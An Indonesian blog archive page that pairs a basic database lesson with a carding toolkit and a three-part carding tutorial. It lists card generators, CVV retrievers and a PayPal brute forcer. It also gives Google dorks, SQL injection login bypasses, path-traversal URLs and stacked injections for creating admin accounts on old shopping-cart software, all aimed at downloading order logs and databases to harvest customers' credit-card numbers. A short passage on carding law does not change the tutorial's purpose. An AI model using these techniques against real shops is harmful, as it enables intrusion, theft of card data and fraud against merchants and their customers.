Home » Archives for Maret 2014
Rabu, 12 Maret 2014
Dasar-dasar Kriptografi & Implementasinya
Dasar-dasar pemograman DataBase MQSL
Artikel Sumber: Feddy@SimpleBlog.Info
- Elemen data / Field : suatu elemen data terkecil yang tidak dapat dipecah lagi.
- Record : gabungan sebuah elemen data yang terkait.
- File : himpunan seluruh record yang berhubungan.
- Pengumpulan data ; data yang diperlukan dikumpulkan dan dicatat pada sebuah form yang disebut dokumen sumber yang berfungsi sebagai input.
- Integritas dan Pengujian ; data diperiksa untuk meyakinkan konsistensi dan akurasi data tersebut.
- Penyimpanan data dan pemeliharaan.
- Keamanan data.
- Organisasi data ; data disusun sedemikian untuk memenuhi kebutuhan user.
- Pengambilan data ; data dibuat agar dapat digunakan oleh user yang berhak.
- Penyimpanan Berurutan / Sequential Access Storage Device (SASD) ;
Media penyimpan untuk mengisikan record yang diatur dalam susunan tertentu. Data pertama harus diproses pertama kali, data kedua diproses kedua kali, dst. - Penyimpanan Akses Langsung / Direct Access Storage Device (DASD) ;
Mekanisme baca atau tulis yang diarahkan ke record tertentu tanpa pencarian secara urut. Komputer mikro memiliki disk drive dan hard disk.
- Pengolahan Batch ;
Mengumpulkan data terlebih dahulu kemudian diproses sekaligus. - Pengolahan On � Line ;
Setiap data yang diinput langsung didapat output atau hasilnya. - Sistem Real Time ;
Sama seperti pengolahan On � Line, hanya saja data yang ada di update sesuai dengan perubahan waktu.
- Hardware ; yang melakukan pemrosesan dan menyimpan database.
- Data.
- User , dapat diklasifikasikan menjadi :
- End User ;
- Pengguna aplikasi, yang mengoperasikan program aplikasi.
- Pengguna interaktif, yang memberikan perintah-perintah beraras tinggi (sintak-sintak query).
- Programmer aplikasi, yang membuat program aplikasi.
- Database Administrator, bertanggung jawab terhadap pengelolaan database.
- End User ;
- Software, sebagai interface antara user dan database.
- Data Definition Language ;
Perintah yang biasa digunakan oleh DBA untuk mendefinisikan skema ke DBMS.
Skema : deskripsi lengkap tentang struktur field, record dan hubungan data pada database.
- Nama database.
- Nama file pada database.
- Nama field dan record.
- Deskripsi file, record dan field.
- CREATE ; membuat table.
- ALTER ; mengubah struktur table.
- DROP ; menghapus table.
- Data Manipulation Language ;
Perintah yang digunakan untuk mengubah, memanipulasi dan mengambil data pada database.
- Prosedural ; menuntut user menentukan data apa saja yang diperlukan dan bagaimana cara mendapatkannya.
- Non Prosedural ; menuntut user menentukan data apa saja yang diperlukan tetapi tidak perlu menyebutkan cara mendapatkannya.
- SELECT ; memilih data.
- INSERT ; menambah data.
- DELETE ; menghapus data.
- UPDATE ; mengubah data.
- Perencanaan database.
- Penerapan database.
- Operasi Database.
- Keamanan Database.
- Mengurangi pengulangan data.
- Independensi data.
- Memadukan data dari beberapa file.
- Memanggil data dan informasi secara tepat.
- Meningkatkan keamanan.
- Menggunakan software yang mahal.
- Menggunakan konfiguarsi hardware yang besar.
- Memperkerjakan dan menggaji Staf DBA yang relatif mahal.
Tools Carding dan Tutorial
Beberapa Software Carding :
1. Credit Card Generator : Disini
2. CChecker : Disini
3. CVV2 Retriever : Disini
4. Credit Card Manager 2010 : Disini
5. Credit Card Check Tool : Disini
6. PayPal Brute Forcer : Disini
Carding merupakan salah satu kejahatan di internet yang berupa penipuan dalam proses perbelanjaan, yaitu dengan berbelanja mengguakan nomor dan identitas kartu kredit orang lain yang diperoleh secara illegal dan biasanya dengan mencuri data di internet. Sasaran yang dituju oleh carder (sebutan bagi para penipu di internet) adalah website berbasis E-commerce yang memungkinkan data basenya menyimpan puluhan bahkan ratusan kartu kredit, paypal atau data nasabah bank. Terdapat banyak karakteristik kejahatan carding yang terjadi, di antaranya adalah :
- Minimized Physical Contact (tidak adanya kontak secara fisik)
System modus ini adalah carder tidak perlu mencuri kartu kredit secara fisik, tapi cukup dengan mengetahui nomornya, pelaku sudah bisa melakukan aksinya. - Non violance (tanpa kekerasan)
Pelaku tidak melakukan kekerasan secara fisik seperti ancaman yang menimbulkan ketakutan sehinga korban memberikan harta bendanya. - Global karena kejahatan ini terjadi lintas negara yang mengabaikan batas-batas geografis dan waktu.
- High Technology
Sarana yang digunakan dalam kejahatan tersebut menggunakan peralatan berteknologi yang berupa jaringan internet.
Dan untuk menangani hal-hal tersebut polri telah menyikapinya dengan membentuk suatu satuan khusus di tingkat Mabes Polri yang dinamakan Direktorat Cyber Crime. Di awali oleh personil terlatih untuk menangani kasus-kasus semacam ini, tidak hanya dalam teknik penyelidikan dan penyidikan, tapi juga mereka menguasai teknik khusus untuk pengamanan dan penyitaan bukti-bukti secara elektronik. Mengingat dana yang terbatas karena mahalnya peralatan dan biaya pelatihan personil, maka apabila terjadi kejahatan di daerah, maka Mabes Polri akan menurunkan tim ke daerah untuk memberikan asistensi. Dan secara detil dapat saya kutip isi pasal tersebut yang menerangkan tentang perbuatan yang dianggap melawan hukum menurut UU ITE berupa illegal access:
Pasal 31 ayat 1: �Setiap orang dengan sengaja dan tanpa hak atau melawan hukum melakukan intersepsi atau penyadapan atas informasi elektronika dan atau dokumen elektronik dalam suatu komputer dan atau sistem elektronik secara tertentu milik orang lain.�
Pasal 31 ayat 2: �Setiap orang dengan sengaja atau tanpa hak atau melawan hukum melakukan intersepsi atau transmisi elktronik dan atau dokumen elektronik yang tidak bersidat publik dari, ke dan di dalam suatu komputer dan atau sistem elektronik tertentu milik orang lain, baik yang tidak menyebabkan perubahan, penghilangan dan atau penghentian informasi elektronik dan atau dokumen elektronik yang ditransmisikan.� . semoga langkah awal dari pengamanan ini mampu mencegah kejahatan-kejahatan yang terus meningkat. Amienn ���!
Carding Bagian 1
ini adalah tutor lama, tapi mungkin saja
masih bisa membantu temen� seperti saia
yang baru belajar.....
Contoh bugs pada bentuk toko system :
shopadmin
Ketik keyword google :
allinurl:/shopadmin.asp
Contoh target : http://www.Target.com/shopadmin.asp
user : 'or'1
pass : 'or'1
Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google :
allinurl:/store/index.cgi/page=
Contoh target:
http://www.Target.com/cgi-bin/store/inde...e=short_bl ue.htm
Hapus short_blue.htm dan gantidengan
:./admin/files/order.log
Hasilnya:www.Target.c om/cgi-bin/store/index.cgi?page=../admin/files/order... log
Contoh bugs pada bentuk toko sistem :
metacart
Ketik keyword google.com :
allinurl:/metacart/
Contoh target :
http://www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan :
--> /database/metacart.mdb
Hasilnya:
/www.Target.com/metacart/database/metacart.mdb
Contoh bugs pada bentuk toko sistem :DCShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : http://www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
Hasilnya:
http://www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : http://www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan :
/cg-bin/eshop/database/order.mdb
Hasilnya:
http://www.Target.com/.../cg-bin/eshop/d.../order.mdb
Download file *.mdb nya dan Buka file
tsb pakai Microsoft Acces
Carding Bagian 2
masih lanjutan tutor yang sebelumnya.
tetep tutor lama. maklum aja saia kan
newbie..jadi adanya tutor lama.
tapi dengan segala keterbatasan saia,
itu tidak membuat saia berdiam diri dan
tidak berbagi. ya kan??...walaupun
sedikit yang penting berbagi
Contoh bugs pada bentuk toko sistem :
PDshopro
Ketik keyword google.com :
allinurl:/shop/category.asp/catid=
Contoh :
http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx
dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati
file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan
merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces
Contoh bugs pada bentuk toko sistem :
commerceSQL
Ketik keyword google.com :
allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti
dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya:
http://www.Target.com/cgi-bin/commercesq....cgi?page=
Untuk melihat adminconfig
http://www.Target.com/cgi-bin/commercesql/index.cgi?pa ge=../admin/admin_conf.pl
Untuk melihat adminmanager
http://www.Target.com/cgi-bin/commercesql/index.cgi?p age=../admin/manager.cgi
Untuk melihat filelog/CCnya
http://www.Target.com/cgi-bin/commercesql/index.cgi ?page=../admin/files/order.log
Contoh bugs pada bentuk toko sistem :
Cart32 v3.5a
Ketik keyword google.com :
allinurl:/cart32.exe/
Contoh:
http://www.Target.net/wrburns_s/cgi-bin/...e/NoItemFo und
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg
keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di
bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and
Directory Kalau dibagian
tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb.
terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau
semuanya ke notepad atau
program text editor lainnya.
Ganti string url tsb. menjadi seperti
ini :http://www.
Target.net/wrburns_s/cgi-bin/cart32/
Nah. ., paste satu per satu, file .c32 ke
akhir url yg sudah
dimodifikasi tadi, denganformat
http://www.Target.com/cart32/
Contoh
http://w ww.Target.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c 32
Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com :
allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string
berikut di akhir bagian
shopdisplayproducts.asp
Contoh:
http://Target.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%2 0tbluser%20where%20fldusername='admin'%20and%20fldpassw ord%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan
informasi username dan password admin
Untuk login admin ke
http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik -->
allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin
baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into
tbluser (fldusername)values
('')--&SubCategory=&hide=&action.x=46&action.y= 6
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Keyword=&category=3); update tbluser set
fldaccess='1'where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Jangan lupa untuk mengganti dan nya
terserah kamu.
Untuk mengganti password admin, masukkan
keyword berikut :
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername='admin'--&SubCategory=All&action.x=3 3&action.y=6
Untuk login admin, ada di
http://Target/vpasp/shopadmin.asp
Carding Bagian 3
tetep tutor lama dari seorang
pemula..huekekekekeke. maaf yak kalo ada
yang salah. mohon dikoreksi kembali
Contoh bugs pada bentuk toko sistem :
Lobby.asp
Ketik keyword google.com : allinurl:
Lobby.asp
Contoh : http://www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti
dengan : fpdb/shop.mdb
Hasilnya : http://www.Target.com/fpdb/shop.mdb
Contoh bugs pada bentuk toko sistem :
Shopper.cgi
Ketik keyword google.com : allinurl:
/cgi-local/shopper.cgi
Contoh:
http://www.Target.com/cgi-local/shopper....dd=action& key=
Tambah dengan :...&template=order.log
Hasilnya:
http://www.xxxxxxxx.com/cgi-local/shoppe...add=action &key=...&template=order.log
Contoh bugs pada bentuk toko sistem
:Proddetail.asp
Ketik keyword google.com :
allinurl:proddetail.asp?prod=
Contoh:
http://www.Target.org/proddetail.asp?pro...SledRaffle
H apus tulisan proddtail.asp?prod=SG369
dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya :
http://www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem
:Digishop
Ketik keyword google.com :
inurl:"/cart.php?m="
Contoh :
http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan -->admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake
statment SQL injection
Usename : 'or"="
Password : 'or"="
setelah bisa login, cari data yang
diperlukan .
Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google.com :
allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example:
http://www.target.com/cgi-bin/store/...ir_Manuals.ht m
masukin bugsnya:
http://www.target.com/cgi-bin/store/...iles/order.lo g
trus copy-paste tuch log'nya di notepad
biar gampang di baca
Contoh bugs pada bentuk toko sistem :
Index Cart
Ketik keyword google.com :
inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya :'or"="
contoh target buat kalian :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :
Index cart
Ketik keyword google.com : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya
ama admin/scart.mdb
example LIVE TARGET EDITED
Injection : selanjutnya masukin bugs di
atas jadi : LIVE TARGET EDITED
kalo berhasil loe dapet file
beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com :
/shop/category.asp/catid=
Bugs : hapus tulisan
/shop/category.asp?catid=2 ganti dengan
/admin/dbsetup.asp
example : LIVE TARGET EDITED
masukin bugs menjadi : LIVE TARGET EDITED
kalo berhasil dapet file.mdb trus buka
pake MS - Access
ontoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com :
inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan
proddetail.asp?prod= dengan
fpdb/vsproducts.mdb
Example : LIVE TARGET EDITED
masukin bugsnya LIVE TARGET EDITED
download file .mdbnya trus buka pake MS-
ACCESS..
Contoh bugs pada bentuk toko sistem :
Sunshop
Ketik keyword google.com : "Powered by
SunShop 3.2"
Atau google dork :
inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik
"OK" aja
Contoh buat kalian : LIVE TARGET EDITED
ganti dengan admin http LIVE TARGET EDITED
Login pake SQL Injection :
Username : admin
Password :'or''='
Contoh bugs pada bentuk toko sistem :
digishop
Ketik keyword google.com
Ketik keyword google.com : "Powered by
Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan
admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="
Contoh target :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com :
inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp
dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search
our Inventory
jadi LIVE TARGET EDITED
dapat dech .mdb ===> trus klik open
database JANGAN klik "convert
databese" ===> klk view orders ====>
trus cari orang yg pernah
belanja contoh pada customer no 36 trus
dimana no CCnya badKiddes....
sabar bro... masih di table customer no
36 then klikpayment